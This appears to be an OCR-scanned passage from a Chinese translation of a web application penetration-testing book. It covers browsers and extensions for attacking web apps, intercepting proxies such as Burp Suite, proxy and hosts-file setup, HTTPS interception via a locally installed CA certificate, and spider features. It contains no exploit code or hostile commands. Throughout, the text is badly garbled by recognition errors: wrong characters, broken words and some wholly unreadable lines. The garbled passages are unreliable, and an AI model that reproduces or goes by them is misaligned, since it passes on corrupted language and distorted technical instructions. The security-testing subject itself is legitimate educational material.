Microsoft 的 Internet Explorer (IE) 是 当前 应 用 最 广泛 的 Web 浏 览 
俐 。 据 估计 ， 现 在 依然 如 此 ，IE 市 场 占有 率 大 约 为 45%。 几乎 所 有 的 
Web 应 用 程序 都 针对 IE 设 计 ， 并 通过 I 开 进 行 测 试 ， 这 使 得 它 成 为 攻击 
者 的 首选 浏览 器 ， 因 为 大 多 数 应 用 程序 的 内 容 与 功能 都 能 够 在 正中 正 
确 显示 和 使 用 。 而 且 ， 其 他 浏览 右 本 号 并 不 文 持 ActiveX 控 件 ， 因 此 ， 
如 果 一 个 应 用 程序 使 用 这 种 控件 ， 束 必须 使 用 下 来 浏览 它 。 使 用 下 的 
局 限 性 在 于 ， 与 使 用 其 他 浏览 器 不 同 ， 它 必须 在 Microsoft Windows 平 
合 上 运行 。 

由 于 下 被 人 们 广泛 使 用 ， 因 此 ， 当 测试 器 站 点 脚本 与 其 他 针对 应 
用 程序 用 户 的 攻击 时 ， 应 该 始终 确 你 攻击 能 够 在 这 种 浏览 器 上 成 功 实 
施 (请 参阅 第 12 章 了 解 相 关内 容 ) 。 


所 f | 注解 ”Internet Explorer 8 引入 了 一 个 默认 处 于 启用 状态 的 反 


XSS 人 篇 选 器 。 如 第 12 章 所 述 ， 此 筛选 器 会 尝试 阻止 大 多 数 标 准 的 
XSS 攻 击 ， 因 此 ， 在 针对 目标 应 用 程序 测试 XSS 入 侵 程序 时 ， 该 租 


选 器 可 能 会 导致 问题 。 通 常 ， 在 测试 过 程 中 应 禁用 该 XSS 沛 选 器 。 
在 确认 有 某 个 XSS 漏 洞 后 ， 最 好 是 重新 局 用 该 猎 选 右 ， 看 是 否 可 以 利 
用 发 现 的 漏洞 找到 避 开 该 入 选 套 的 方法 。 


以 下 IE 扩展 有 助 于 攻击 Web 应 用 程序 。 
口 HttpWatch 可 分 析 所 有 HTTP 请 求 与 啊 应 ， 提 供 消 息 头 、cookie、 
URL ` 请求 参数 、HTTP 状 态 码 与 重 定向 等 信息 (如 图 20-1 所 示 ) 
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图 20-1 HttpWatchX} Internet Explorer 发 布 的 HTTP 请 求 进行 分 析 


Sinn 一 


口 EWatch 的 功能 与 HttpWatch 类 似 ， 同 时 还 可 分 析 HTTP 文 档 、 
像 、 脚 本 等 。 


20.1.2 Firefox 


Firefox 是 当前 第 二 大 Web 浏 览 右 ， 据 估计 ， 市 场 占 有 率 大 约 为 
359%6。 绝 大 多 数 Web 应 用 程序 可 在 Firefox 上 正常 运行 ， 但 是 ， 它 本 刁 
并 不 支持 ActiveX 控 件 。 

不 同 的 浏览 器 在 处 理 HTMIL 方 面 存在 许多 细微 的 差异 ， 特 别 是 当 
HTML 并 不 严格 符合 标准 时 。 通 常 ， 如 果 一 个 应 用 程序 针对 跨 站 点 脚 
本 实施 防御 ， 这 意味 着 针对 它 的 攻击 并 不 会 对 每 种 浏览 器 平台 有 效 。 
Firefox 的 普及 使 得 这 种 浏览 器 成 为 XSS 攻 击 的 主要 目标 ， 因 此 ， 如 果 
在 IE 上 实施 XSS 攻 击 遇 到 困难 ， 应 该 党 试 在 Firefox 上 测试 这 些 攻 击 。 
此 外 ， 之 前 ， 针 对 下 无 效 的 许多 攻击 能 够 对 Firefox 实 施 ， 主 要 因为 它 
的 某 些 特 有 功能 ， 参 见 第 13 章 了 解 这 方面 的 内 容 。 


= 攻击 Web 应 用 程序 时 ， 有 大 量 Firefox 浏 览 器 扩展 可 供 使 用 ， 如 
下 局 

J Http Watch 也 适用 于 Firefox ° 

口 FoxyProxy 能 够 灵活 管理 浏览 怖 的 代理 设置 ， 可 实现 迅速 切换 以 
及 为 不 同 的 URL 设 置 不 同 的 代理 等 。 

口 LiveHTTPHeaders 可 修改 请 求 与 啊 应 ， 并 重新 发 布 个 别 请 求 。 
口 使 用 PrefBar 可 启用 或 禁用 cookie、 快 速 进行 访问 控制 检查 、 在 
不 同 代理 服务 颖 之 间 切 换 、 清 除 缓存 ， 以 及 打开 浏览 右 的 用 户 代理 。 
口 Wappalyzer 可 确定 当前 页 面 使 用 的 各 种 技术 ， 并 在 URL 栏 为 发 
现 的 每 一 种 技术 显示 一 个 图 标 。 

口 Web Developer 工 具 栏 提供 了 大 量 有 用 功能 。 其 中 最 重要 的 功能 
包括 查看 页 面 上 的 所 有 链接、 更 改 HTML 使 表单 字段 可 写 、 取 消 最 大 
长 度 限 制 、 显 示 隐 藏 表单 字段 ， 以 及 将 请 求 方法 由 GET 更 改 为 POST。 


20.1.3 Chrome 


在 浏览 硕 领 域 ，Chrome 是 一 黎 相 对 较 产 的 浏览 部 ， 但 它 迅 速 顾 得 
用 户 的 欢迎 ， 并 占领 了 约 15% 的 市 场 。 
攻击 Web 应 用 程序 可 能 会 用 到 各 种 Chrome 浏 览 右 扩展 ， 如 下 所 
ZR e 

O XSS Rays， 该 扩展 可 用 于 测试 XSS 漏 洞 和 DOM 检 测 。 

g cookie 编 辑 希 ， 用 于 在 浏览 侠 中 碍 看 和 编辑 cookie 。 

口 Wappalyzer 也 可 以 用 于 Chrome。 

口 Web Developer 工具 栏 也 可 以 用 于 Chrome ° 

Chrome 可 能 包含 一 些 奇怪 的 功能 ， 在 构建 针对 XSS 和 其 他 漏洞 的 
攻击 时 ， 这 些 功能 可 能 会 有 用 。 由 于 Chrome 是 一 球 相 对 较 新 的 浏览 
人 名， 因此 ， 在 未 来 数 年 中 ， 人 研究 这 些 功 能 可 能 会 取得 一 定 的 成 果 。 


20.2 k 


当 攻 击 Web 应 用 程序 时 ， 除 基本 的 Web 浏 览 右 外 ， 工 具 包 中 最 有 
用 的 工具 为 拦截 代理 服务 器 。 在 web 应 用 程序 发 展 的 早期 ， 拦 截 代 理 
服务 器 是 一 种 独立 的 工具 ， 它 提供 最 基本 的 功能 ，Achilles 代 理 服务 央 
是 尤其 受 推崇 的 一 种 ， 它 显示 每 一 个 请 求 与 啊 应 ， 以 方便 对 其 进行 编 
辑 。 虽 然 这 款 工具 极其 简单 ， 存 在 许多 缺陷 ， 而 且 使 用 起 来 也 不 方 
便 ， 但 经 验 丰 富 的 攻击 者 仍然 可 以 利用 它 攻 破 许 多 Web 应 用 程序 。 

近年 来 ， 这 款 简 单 的 拦截 代理 服务 絮 已 经 发 展 成 为 许多 功能 强大 
的 工具 套件 ， 包 含 儿 种 相互 补充 的 工具 ， 能 够 完成 攻击 Web 应 用 程序 
过 程 中 的 常见 任务 。Web 应 用 程序 安全 测试 仪 常用 的 测试 套件 如 下 所 
ZN: 


DQ Burp Suite 
g WebScarab 
g Paros 
g Zed Attack Proxy 
口 Andiparos 
口 Fiddler 
g CAT 
DQ Charles 
这 些 工 具 包 的 功能 各 不 相同 ， 其 中 一 些 相 对 较 新 ， 并 更 具 实 验 
性 。 单 纯 就 功能 而 言 ，Burp Suite 是 其 中 最 为 复杂 全 面 的 工具 。 当 前 ， 
它 是 唯一 包含 以 下 几 市 介绍 的 所 有 功能 的 工具 包 。 在 某 种 程度 上 ， 选 
择 使 用 哪些 工具 因 个 人 喜好 而 异 。 我 们 建议 没有 任何 喜好 的 测试 员 在 
现实 应 用 中 移 选 择 几 种 套件 ， 然 后 确定 哪些 工具 最 适合 上 自己 的 需求 。 
本 节 介 绍 这 些 工 具 的 工作 原理 ， 并 说 明 在 测试 Web 应 用 程序 时 充 
分 利用 这 些 工 具 的 常用 工作 流程 。 


20.2.1 工作 原理 
上 述 每 一 种 集成 测试 套件 都 由 几 种 相互 补充 的 工具 组 成 ， 它 们 共 


训 与 目标 应 用 程序 有 关 的 信息 。 通 党 ， 攻 击 者 通过 浏览 硕 以 正常 方式 
攻击 应 用 程序 ， 这 些 工具 监控 生成 的 请 求 与 啊 应 ， 保 存 所 有 与 目标 应 


用 程序 有 关 的 信息 ， 并 提供 大 量 有 用 的 功能 。 每 一 种 套件 由 以 下 核心 
组 件 构 成 : 
口 拦截 代理 服务 器 
g WebM H FEJT IER 
口 Ae Webby H FENY m MaS 
me Pr A E aS 
口 手 动 请 求 工 具 

口 分 析 会 话 cookie 与 其 他 令 牌 的 工具 

口 各 种 共享 功能 与 实用 工具 
1. 拦截 代理 服务 器 

拦截 代理 服务 器 是 工具 套件 的 核心 ， 至 今 仍 然 是 最 基本 的 组 件 。 
要 使 用 拦截 代理 服务 器 ， 必 须 配 置 浏 览 右 ， 将 它 的 代理 服务 器 作为 本 
地 机 妖 上 的 一 个 端口 。 同 时 配置 代理 工具 监听 这 个 端口 ， 并 接收 由 浏 
哆 絮 发 布 的 所 有 请 求 。 由 于 代理 服务 絮 能 够 访问 浏览 器 与 目标 Web 服 
务 絮 之 间 的 双 辣 通信 ， 因 而 它 能 够 拦截 它们 之 则 传送 的 每 一 条 消 乱 ， 
以 方便 用 户 审 查 和 修改 ， 并 执行 其 他 有 用 的 功能 ， 如 图 20-2 所 示 。 
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图 20-2 ”使 用 拦截 代理 服务 器 动态 处 理 HTTP 请 求 


o ACA has 

浏览 器 的 配置 过 程 相当 人 简单。 首先 ， 确 定 拦 截 代理 服务 右上 默认 使 
用 哪 一 个 本 地 端口 监听 连接 (通常 为 8080 端 口 ) ， 然 后 在 浏览 器 上 执 
行 以 下 步骤 。 

口 在 mmternet Explorer F, W$“ LR” > “Intenet” > “E 
R” “局 域 网 设置 ?。 确 保 没 有 选中 * 目 动 检测 设置 ”与 “使 用 自动 配置 
脚本 ” 复 选 框 。 确 保 选 中 “为 LAN 使 用 代理 服务 右 * 复 选 框 。 在 “地 址 ” 栏 
中 输入 127.0.0.1; 在 “端口 ” 栏 中 输入 代理 服务 器 使 用 的 端口 。 单 击 “ 高 
级 ”按钮 ， 确 保 选 中 “对 所 有 协议 均 使 用 相同 的 代理 服务 絮 * 复 选 框 。 如 
果 所 攻击 的 主机 名 称 与 “对 于 以 下 列 字 符 开 头 的 地 址 不 使 用 代理 服务 
局 ? 框 中 的 任何 一 个 表达 式 相 匹配 ， 删 除 这 些 表 达 式 。 在 所 有 对 话 框 上 
单 击 “确定 ”按钮 ， 确 认 重 新 配置 。 

口 在 Firefox 中 ， 选 择 “ 工 具 ” 一 “选项 一 “高 级 ”， 选 择 “ 网 络 ? 选 项 
卡 ， 单 击 “ 连 接 ” 栏 的 “设置 ”按钮 ， 确 保 选 中 “手动 配置 代理 ”选项 。 
在 “代理 * 栏 中 输入 127.0.0.1; 在 “端口 ? 栏 中 输入 代理 服务 器 使 用 的 端 
口 。 如 果 所 攻击 的 主机 名 称 与 “不 使 用 代理 ”* 框 中 的 任何 一 个 表达 式 相 
En 删除 这 些 表达 式 。 在 所 有 对 话 框 上 单 击 “确定 ”按钮 ， 确 认 重 新 

ae 

口 Chrome 使 用 其 所 在 的 操作 系统 附带 的 本 地 浏览 器 的 代理 设置 。 
在 Chrome 中 ， 可 以 通过 选择 “选项 ”>“ 禹 级 选项 ”一 “网络” “更 改 代理 
设置 ”访问 这 些 设置 。 


处 理 “ 不 支持 代理 ”的 客户 器 


有 时 ， 测 试 员 需要 测试 使 用 在 浏览 喜 以 外 运行 的 厚 客 户 端的 应 
用 程序 。 许 多 这 类 客户 端 并 不 提供 任何 用 于 配置 HITP 代 理 服 务 丹 
的 设置 。 它 们 只 是 尝试 直 接连 接 到 托管 应 用 程序 的 Web 服 务 器 。 这 
种 行为 导致 测试 员 根本 无 法 使 用 拦截 代理 服务 器 来 查看 和 修改 应 用 
程序 的 流量 。 

对 好 ， 在 这 种 情况 下 ， 测 试 员 可 以 利用 Burp Suite 提 供 的 一 些 功 
能 继续 完成 测试 。 为 此 ， 测试 员 需要 执行 以 下 步骤 ; 

(1) 修改 操作 系统 hosts 文 件 ， 将 应 用 程序 使 用 的 主机 名 解析 
为 测试 员 自 己 的 回环 地 址 (127.0.0.1) 。 例 如 : 127.0.0.1 
www.wahh-app.com 这 会 导致 厚 客户 端的 请 求 被 重 定 疝 到 测试 员 目 己 
的 计算 机 。 

(2) 对 于 应 用 程序 使 用 的 每 个 目标 端口 《通常 为 80 和 443 端 
O) ， 在 回环 接口 的 这 些 端口 上 配置 一 个 Burp Suite 监 昕 器 ， 并 将 该 
监听 器 设置 为 文 持 匿名 代理 。 匿 名 代理 功能 指 监听 器 将 接受 厚 客户 
a (这 些 请 求 已 被 重 定 癌 到 测试 员 的 回环 
地 址 ) 。 

(3) 匿名 模式 代理 支持 HTTP 和 HTTPS 请 求 。 为 防止 SSL 遇 到 
致命 的 证 书 错误 ， 可 能 需要 将 匿名 代理 监听 锅 配 置 为 显示 包含 厚 客 
户 端 期 望 鸭 特定 主机 名 的 SSL 证 书 。 下 文 将 详细 说 明 如 果 避 免 拦 堆 
代理 服务 器 导致 的 证 书 问 题 。 

(4) 对 于 已 使 用 hosts 文 件 重 定 癌 的 每 个 主机 名 ， 配 置 Burp 将 
主机 名 解析 为 其 原始 的 人 P 地 址 。 这 些 设置 位 于 
Options > Connections > Hostname Resolution GM > 连接- 主机 名 
解析 ) 下 。 测 试 员 可 以 通过 这 些 设置 指定 域名 到 IP 地 址 的 定制 映 
射 ， 以 履 盖 计算 机 上 自己 的 DNS 解 析 。 这 样 ，Burp 提 出 的 出 站 请 求 将 
指出 正确 的 目标 服务 器 。 (如 果 不 执行 此 步 又 ， 请 求 将 在 无 限 循 环 
中 重 定向 到 测试 员 自 己 的 计算 机 。 ) 

(5) 在 匿名 模式 下 运行 时 ，Burp Proxy 将 确定 应 使 用 在 请 求 中 
显示 的 Host 消 息 头 将 每 个 请 求 转 发 到 的 目标 主机 。 如 采 所 测试 的 厚 
客户 端 未 在 请 求 中 包含 Host 消 息 头 ，Burp 将 无 法 正确 转发 请 求 。 如 


条 只 需 处 理 一 个 目标 主机 ， 可 以 通过 将 匿名 代理 监听 闫 配置 为 将 所 
有 请 求 重 定 同 到 所 需 目 标 主机 来 解决 这 一 问题 。 但 如 采 要 处 理 多 个 
目标 主机 ， 则 需要 在 多 人 台 计 算 机 上 运行 多 个 Burp 实 例 ， 并 使 用 hosts 


文件 将 每 个 目标 主机 的 流量 重 定向 到 其 他 拦截 服务 器 。 


o 拦截 代理 服务 器 与 HITPS 

如 第 3 章 所 述 ， 当 处 理 未 加 密 的 HTTP 通 信 时 ， 拦 截 代 理 服务 器 与 
普通 的 Web 代 理 服务 器 的 工作 原理 基本 相同 。 浏 览 器 首先 疝 代 理 服务 
髓 发 送 标准 的 HTTP 请 求 ， 不 同 之 处 在 于 ， 请 求 第 一 行 的 URL 包 含 目 标 
Web 服 务 器 的 完整 主机 名 称 。 代 理 服务 器 将 这 个 主机 名 称 解析 成 一 个 
IP 地 址 ， 把 请 求 转换 为 标准 的 非 代理 形式 ， 然 后 将 它 转 发 给 目标 服务 
器 。 当 该 服务 器 做 出 响应 时 ， 代 理 服务 器 就 会 将 响应 转发 给 客户 端 浏 
TLAN ° 

对 于 HTTPS 通 信 ， 浏 览 器 首先 使 用 CONNECT 方 法 向 代理 服务 器 
提出 一 个 明文 请 求 ， 指 定 目 标 服务 器 的 主机 名 称 与 端口 。 如 果 使 用 普 
通 的 〈 非 拦截 ) 代理 服务 器 ， 代 理 服务 器 就 会 以 一 个 HITP 200 状 态 码 
做 出 啊 应 ， 一 直 开 放 TCP 连 接 ， 从 此 以 后 〈 对 该 连接 而 言 ) 作为 目标 
服务 器 的 TCP 级 中 继 。 然 后 ， 浏 贤 器 将 与 目标 服务 器 进 行 一 次 SSL 握 
手 ， 建 立 一 条 安全 信道 ， 通 过 它 传送 HTTP 消 息 。 当 使 用 拦截 代理 服务 
铬 时 ， 为 使 代理 服务 器 访问 浏 贤 器 通过 信道 传送 的 HTTP 消 和 忠 ， 这 个 过 
程 会 稍 有 不 同 。 如 图 20-3 所 示 ， 用 一 个 HTTP 200 状 态 码 啊 应 
CONNECT 请 求 后， 拦截 代理 服务 絮 并 不 作为 一 个 中 继 ， 而 是 在 服务 
髓 端 与 浏览 器 进行 SSL 握 手 。 它 还 作为 一 个 SSL 客 户 端 ， 与 目标 Web 服 
务 器 进行 男 一 次 SSL 握 手 。 因 此 ， 这 个 过 程 建立 两 条 SSL 信 道 ， 代 理 服 
务 器 则 作为 它们 之 间 的 “中 间 人 ”。 这 样 ， 代 理 服务 器 就 能 够 解密 从 每 
条 信道 收 到 的 所 有 消息 ， 以 明文 形式 访问 它们 ， 然 后 重新 对 其 进行 加 


密 ， 以 通过 男 一 条 信道 传送 。 
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图 20-3 ”通过 拦截 代理 服务 器 查看 和 修改 HTTPS 通 信 


当然 ， 如 采 攻 击 者 处 在 适当 的 位 置 ， 他 整 能 够 拦截 浏 唤 器 与 目标 
服务 器 之 间 的 通信 ， 并 且 不 会 被 发 现 ， 这 时 ， 由 于 SSL 无 法 保护 浏 宽 
右 与 服务 右 之 间 通 信 的 隐秘 性 与 完整 性 ， 它 也 就 失去 了 作用 。 为 此 ， 
当 进 行 SSL 握 手 时 ， 束 必须 使 用 加 密 证 书 来 验证 每 一 方 的 映 份 ， 这 点 
尤为 天 键 。 为 了 在 服务 器 端 与 浏览 硕 进 行 SSL 握 手 ， 拦 截 代 理 服 务 大 
必须 使 用 它 目 己 的 SSL 证 书 ， 因 为 它 并 不 知道 目标 服务 器 所 使 用 的 私 


钥 。 

在 这 种 情况 下 ， 为 防止 攻击 ， 浏 览 器 会 向 用 户 提 出 警告 ， 提 醒 他 
们 检查 伪造 的 证 书 ， 并 上 自行 决定 是 否 信任 该 证 书 。 图 20-4 为 下 显示 的 
警告 。 当 然 ， 当 使 用 拦截 代理 服务 器 时 ， 浏 览 器 与 代理 服务 器 都 完全 
由 攻击 者 控制 ， 因 此 它们 将 接受 伪造 的 证 书 ， 并 人 允许 代理 服务 器 建立 
两 条 SSL 信 道 。 
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图 20-4 ”使 用 采用 HTTPS 通 信 的 拦截 代理 服务 器 将 在 攻击 者 的 浏览 器 中 生成 警告 


使 用 浏览 絮 测 试 使 用 单一 域 的 应 用 程序 时 ， 以 这 种 方式 处 理 浏 唤 
絮 安 全 警告 和 接受 代理 服务 絮 的 目 造 证 书 通 常 不 会 遇 到 问题 。 但 是 ， 
在 其 他 情况 下 仍 有 可 能 出 现 问题 。 当 前 的 许多 应 用 程序 需要 针对 图 
像 、 脚 本 代码 和 其 他 资源 提出 大 量 路 域 请 求 。 在 使 用 HTTPS 时 ， 每 一 
个 指 癌 外 部 域 的 请 求 都 会 导致 浏览 絮 收 到 代理 服务 絮 的 无 效 SSL 证 
书 。 在 这 种 情况 下 ， 浏 贤 磺 通 名 不 会 癌 用 户 提 出 警告 ， 因 此 也 不 会 为 
用 户 提 供 接受 每 个 域 的 无 效 SSL 证 书 的 选项 。 相 反 ， 浏 贤 器 通常 会 
FPS BER, 要 么 直接 丢弃 ， 要 么 显示 一 条 警告 ， 指 出 请 求 已 被 丢 
Fo 

使 用 在 浏览 絮 以 外 运行 的 厚 客户 端 时 ， 代 理 服 务 絮 的 自 造 SSL 证 
书 也 会 导致 回 题 。 通 常 ， 如 果 收 到 无 效 SSL 证 书 并 且 无 法 接受 该 证 
书 ， 将 无 法 与 这 些 客 户 端 建立 连接 。 

邓 好 ， 有 一 个 简单 的 方法 可 以 解决 上 述 问 题 。 在 安装 时 ，Burp 
Suite 会 为 当前 用 户 生 成 一 个 唯一 的 CA 证 书 ， 并 将 该 证 书 存 储 在 本 地 计 
算 机 上 。 当 Burp Proxy 收 到 指 疝 新 域 的 HTTPS 请 求 时 ， 它 会 为 这 个 域 
动态 创建 新 的 主机 证 书 ， 并 使 用 以 上 CA 证 书签 署 此 证 书 。 这 意味 着 用 
户 可 以 在 其 浏览 器 (或 其 他 信任 库 ) 中 将 Burp 的 CA 证 书 安装 为 可 信和 根 


证 书 。 这 样 ， 为 所 有 主机 生成 的 证 书 被 视 为 有 效 证 书 ， 因 而 避免 了 代 
理 服务 右 导 致 的 所 有 SSL 错 误 。 
安装 CA 证 书 的 精确 方法 因 浏 充 融和 平台 而 异 。 基 本 上 ， 安 装 过 程 
包括 以 下 步骤 。 
(1) 使 用 浏览 器 通过 代理 服务 器 访问 任何 HPPTS URL ° 
(2) 在 生成 的 浏览 器 警告 中 ， 展 开 证 书 链 ， 在 证 书 树 ( 称 为 
PortSwigger CA) 中 选择 根 证 书 。 
(3) 将 此 证 书 作 为 可 信 根 证 书 或 证 书 颁 发 机 构 导 入 浏览 器 。 可 能 
需要 先导 出 此 证 书 ， 然 后 再 单独 将 其 导入 (AD Gta) 。 
有 关 在 不 同 浏览 器 上 安装 Burp CA 证 书 的 详细 说 明 ， 请 参阅 位 于 
以 下 URL 的 Burp Suite 在 线 文档 : 
http://portswigger.net/burp/help/servercerts.html 
@ 共同 特性 
除 拦截 和 修改 请 求 与 啊 应 这 种 核心 功能 外 ， 拦 截 代理 服务 器 还 包 
伟大 量 其 他 特性 (如 下 所 示 ) ， 可 帮助 渗透 测试 员 提 高 攻击 web 应 用 
程序 的 效率 。 
口 详 细 的 拦截 规则 。 根 据 目标 主机 、URL、 方法、 资源 类 型 、 啊 
应 码 或 出 现 的 特殊 表达 式 ( 见 图 20-5) 等 标准 拦截 消息 ， 然 后 审查 或 
音 中 转发 这 些 消息 。 在 一 般 的 应 用 程序 中 ， 渗 透 测试 员 对 绝 大 多 数 的 
请 求 与 啊 应 都 不 感 兴趣 ， 他 可 以 利用 这 项 功能 配置 代理 服务 絮 仅 标记 
感 兴趣 的 消息 。 


,busp wie profesional P 
bup intruder repeater window about 


图 20-5 ”Burp 代 理 服务 器 支持 详细 的 请 求 与 响应 拦截 规则 


口 所 有 请 求 与 啊 应 的 详细 历史 记录 。 通 过 它 可 审查 之 前 传送 的 消 
息 ， 并 可 将 它们 传送 给 套件 中 的 其 他 工具 ， 以 进行 深入 分 析 (参见 图 
n a a aL o ATIE 速 查找 特定 数据 项 ， 
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图 20-6 ”代理 服务 器 历史 记录 ， 人 允许 攻击 者 通过 代理 服务 器 查看 、 过 滤 、 搜 索 和 标 
记 请 求 和 响应 


口 用 于 动态 修改 请 求 与 啊 应 内 容 的 目 动 匹配 与 奉 换 规则 。 这 项 功 
能 的 用 途 广 泛 ， 例 如 ， 在 所 有 请 求 中 修改 某 个 cookie 或 其 他 参数 的 
值 ， 删 除 缓存 指令 ， 用 User-Agent 消 息 头 模拟 某 个 特殊 的 浏览 器 ， 等 


等 。 


口 除 客户 端 UI 外 ， 直 接 通过 浏览 右 访 问 代 理 服 务 避 的 功能 。 渗 透 
测试 员 可 以 使 用 这 项 特性 浏览 代理 历史 ， 从 浏览 右 中 重新 发 布 请 求 ， 
从 而 以 正常 方式 处 理 并 拦截 啊 应 。 

口 控 纵 HTTP 消 息 格 式 的 实用 工具 ， 如 在 不 同 的 请 求 方法 与 内 容 编 
码 之 间 进 行 转换 。 有 时 ， 渗 透 测 试 员 还 可 以 使 用 这 些 工 具 优 化 跨 站 点 
脚本 之 类 的 攻击 。 

口 能 够 实时 自动 地 修改 革 些 HTML 特 性 ， 如 显示 隐藏 表单 字段 ， 
删除 输入 字段 限制 以 及 删除 JavaScript 表 单 确 认 。 

2. Web HFEF EE 

Web H Farle BAY Leal iil ZH Weble BELL: 请 求 Web 页 
面 ， 解 析 这 些 页 面 ， 从 中 查找 指 癌 其 他 页 面 的 链接 ， 然 后 同 它 们 提出 
请 求 ， 继 续 这 个 过 程 ， 直 到 查 明 一 个 站 点 的 全 部 内 容 。 为 适应 功能 性 
Web 应 用 程序 与 传统 Web 站 点 之 间 的 差异 ， 应 用 程序 朴 虫 不 仅 需要 实 
现 其 核心 功能 ， 还 要 应 对 其 他 各 种 挑战 ， 如 下 所 示 。 


口 基 于 表单 的 导航 ， 使 用 下 拉 列 表 、 文 本 输入 和 其 他 方法 。 
口 基于 JavaScript 的 导航 ， 如 动态 生成 的 菜单 。 
口 要 求 按 预定 顺序 执行 操作 的 多 阶段 功能 。 
口 验证 与 会 话 。 
口 使 用 基于 参数 的 标识 符 ， 而 非 URL， 指 定 不 同 的 内 容 与 功能 。 
口 在 URL 碍 询 字 符 串 中 出 现 令 牌 和 其 他 易 变 参数 ， 导 致 确定 特殊 
内 容 出 现 问题 。 

集成 测试 套件 通过 在 拦截 代理 服务 器 与 爬虫 组 件 之 间 共 吾 数 据 ， 
解决 了 上 述 几 个 问题 。 这 样 ， 渗 透 测 试 员 就 能 够 以 正常 方式 使 用 目标 
应 用 程序 ， 由 代理 服务 器 处 理 所 有 请 求 ， 并 将 其 提交 给 息 虫 进行 深入 
分 析 。 因 此 ， 浏 览 妖 将 会 留意 任何 不 常见 的 导航 、 验 证 与 会 话 处 理 机 
制 ， 人 允许 渗透 测试 员 完 全 控制 企 虫 ,彻底 搜索 应 用 程序 的 内 容 。 这 种 
由 用 户 指导 的 抓 取 技巧 已 在 第 4 章 详细 介绍 了 。 收 集 到 尽 可 能 多 的 信息 
后 ， 疏 虫 惑 可 以 目 行 进行 深入 调查 ， 进 而 发 现 其 他 内 容 与 功能 。 

下 面 是 Web 应 用 程序 爬虫 所 执行 的 冲 用 功能 。 

口 使 用 通过 拦截 代理 服务 器 访问 的 URL 目 动 更 新 站 点 地 图 。 

口 被 动 抓 取代 理 服务 器 处 理 的 内 容 ， 从 中 解析 出 链接 ， 无 须 请 求 
这 些 链 接 就 将 它们 添加 到 站 点 地 图 中 ( 见 图 20-7) 。 
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图 20-7 ”被 动 抓 取 结 果 ， 以 灰色 显示 的 条 目 没 有 经 过 请 求 ， 但 通过 被 动 抓 取 确认 了 


口 以 表格 和 树 状 形式 呈现 所 发 现 的 内 容 ， 方 便 对 这 些 结 采 进行 搜 


口 对 目 动 抓 取 的 范围 进行 细 化 控制 。 这 样 殴 可 以 指定 爬虫 抓 取 的 
主机 名 称 、IP 地 址 、 目 隶 路 径 、 文 件 类 型 等 ， 以 对 某 一 个 特殊 的 功能 
区 域 进行 抓 取 ， 防 止息 虫 访问 目标 应 用 程序 基础 架构 之 内 或 之 外 的 无 
天 链接 。 这 项 功能 还 有 助 于 防止 候 虫 抓 取 管理 接口 之 类 的 强大 功能 ， 
因为 这 样 做 可 能 会 导致 危险 的 负面 影响 ， 如 删除 用 户 账户 。 它 还 可 用 
于 防止 候 虫 请 求 退 出 功能 ， 使 当前 会 话 失 效 。 

口 目 动 解析 HTML 表 单 、 脚 本 、 注 释 和 图 像 ， 并 在 站 点 地 图 内 分 
析 这 些 内 容 。 

口 解析 JavaScript 内 容 ， 查 找 URL 与 资源 名 称 。 即 使 应 用 程序 并 没 
有 使 用 完整 的 JavaScript 引 擎 ， 这 项 功能 也 有 助 于 爬虫 发 现 基 于 
JavaScript 的 导航 ， 因 为 它们 通常 以 字面 量 的 形式 出 现在 脚本 中 。 

口 使 用 适当 的 参数 根据 用 户 的 指导 自动 提交 表单 ( 见 图 20-8) 

submit form lec om ex 


field which should be used when submitting the form. You can control how Burp handles forms in 
the Spider options tab. 


action UR https /mosec nevauth/4/Default ashx 
method POST 
typ name alue 


text usemame 


submit form ignore form 
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D RA EMA OCPEAR RIPI e SKAAI , 
许多 应 用 程序 返回 一 条 HTTP 20078, ° MARIE RICA AS PE A, 
得 到 的 内 容 地 图 束 可 能 包含 错误 信息 。 


口 检查 robots.txt 文 件 ， 该 文件 提供 一 份 列 出 禁止 抓 取 的 URL 黑 名 
单 ， 但 攻击 爬虫 可 以 利用 它 发 现 其 他 内 容 。 

口 目 动 获取 所 有 枚 举 出 的 目录 的 根 目录 。 这 些 内 容 可 用 于 检查 目 
杂 列 表 或 默认 内 容 (请 参阅 第 17 划 了解 相 关内 容 ) 。 

口 目 动 处 理 和 使 用 由 应 用 程序 发 布 的 cookie， 在 通过 验证 的 会 话 
中 进行 抓 取 。 

a 目 动 测试 每 个 页 面 的 会 话 依赖 性 。 这 包括 使 用 和 不 使 用 收 到 的 
cookie 请 求 的 每 个 页 面 。 如 有 果 提 出 的 两 种 请 求 得 到 相同 的 内 容 ， 那 么 
该 页 面 不 需要 会 话 或 验证 即 可 访问 。 这 种 功能 可 用 于 探 碍 一 些 访问 欣 
制 漏洞 〈 请 参阅 第 8 章 了 解 相关 内 容 ) 。 

O 发 布 请 求 时 自动 使 用 正确 的 Referer 消 息 头 。 一 些 应 用 程序 可 能 
会 检查 这 个 消 县 头 的 内 容 ， 这 项 功能 可 确保 聆 虫 尽 可 能 以 类 似 于 普通 
iM eae ATT LSAT ° 
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口 控制 提出 的 目 动 抓 取 请 求 的 速度 与 顺序 ， 避 免 这 些 请 求 令 攻击 
目录 月 浇 ， 如 有 必要 ， 确 你 抓 取 在 隐秘 状态 下 进行 。 

3. 应 用 程序 测试 器 

虽然 仅 使 用 手动 技巧 也 可 以 成 功 实施 攻击 ， 但 是 ， 要 成 为 一 名 真 
正成 熟 的 Web 应 用 程序 渗透 测试 员 ， 必 须 在 攻击 过 程 中 利用 目 动 化 工 
具 ， 提 高 攻击 速度 与 效率 。 第 14 章 已 经 详细 介绍 了 如 何 使 用 目 动 化 工 
具 。 集 成 测试 套件 中 的 每 一 个 工具 都 共有 目 动 完成 各 种 常见 任务 的 功 
能 。 以 下 是 各 种 工具 套件 的 主要 功能 。 

口 手 动 配置 节 见 漏洞 扫描 。 渗 透 测 弃 员 可 以 利用 这 项 功能 准确 控 
制 使 用 哪些 攻击 字符 串 ， 以 及 如 何 将 它们 合并 到 请 求 中 并 审查 其 结 
果 ， 确 定 任何 有 助 于 深入 调查 的 不 剃 见 的 或 反 第 的 啊 应 。 

口 一 组 内 置 的 攻击 有 效 载 茶 和 易 变 琅 数 ， 以 用 户 定 义 的 方式 生成 
任意 有 效 载 柯 。 例 如 ， 根 据 畸 形 编码 、 字 符 置 换 、 亦 力 、 从 前 某 个 攻 
击 中 获得 的 数据 等 。 

WE 


口 查看 和 分 析 啊 应 的 定制 化 功能 。 例 如 ， 可 根据 特定 表达 式 或 有 
